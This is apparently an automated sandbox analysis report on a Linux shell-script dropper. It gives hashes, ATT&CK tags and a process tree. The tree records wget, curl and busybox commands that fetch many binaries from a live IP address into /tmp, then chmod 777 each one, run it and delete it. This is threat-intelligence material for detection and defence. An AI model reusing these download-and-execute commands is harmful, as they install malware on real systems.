27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb

General

Target

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Size

10KB
MD5

0e701247eed8c2ac85ce4310d37e674d
SHA1

7ca0caf639c6d80baffe549e24e3018daaa8bbb8
SHA256

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
SHA512

0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
SSDEEP

96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
935	chmod
947	chmod
965	chmod
774	chmod
805	chmod
837	chmod
911	chmod
812	chmod
818	chmod
977	chmod
875	chmod
899	chmod
923	chmod
860	chmod
905	chmod
941	chmod
953	chmod
887	chmod
917	chmod
737	chmod
743	chmod
869	chmod
893	chmod
749	chmod
929	chmod
959	chmod
971	chmod
881	chmod

Executes dropped EXE 28 IoCs

Processes:

rpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk46wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChkC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0dorOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsHSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVArpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0do6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChrOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVAI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl

/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
1⤵
PID:710

/bin/rm
/bin/rm bins.sh
2⤵
PID:714

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:717

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:736

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:737

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:738

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:739

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:740

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:741

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:742

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:743

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:744

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:745

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:746

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:748

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:749

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:750

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:751

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:753

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:768

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:774

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:776

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:778

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:780

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:800

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:805

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:806

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:808

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:809

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:811

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:812

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:813

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:814

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:815

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:817

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:818

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:819

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:820

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:821

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:831

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:837

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:838

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:841

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:842

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:858

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:860

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:861

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:862

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:863

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:868

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:869

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:870

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:871

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:872

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:874

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:875

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:876

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:877

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:878

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:880

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:881

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:882

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:883

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:884

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:886

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:887

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:888

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:889

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:890

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:892

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:893

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:894

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:895

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:896

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:898

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:899

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:900

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:901

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:902

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:904

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:905

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:906

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:907

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:908

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:910

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:911

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:912

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:913

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:914

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:916

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:917

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:918

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:919

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:920

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:922

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:923

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:924

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:925

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:926

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:928

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:929

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:930

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:931

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:932

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:934

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:935

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:936

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:937

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:938

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:940

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:941

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:942

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:943

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:944

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:946

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:947

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:948

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:949

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:950

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:952

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:953

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
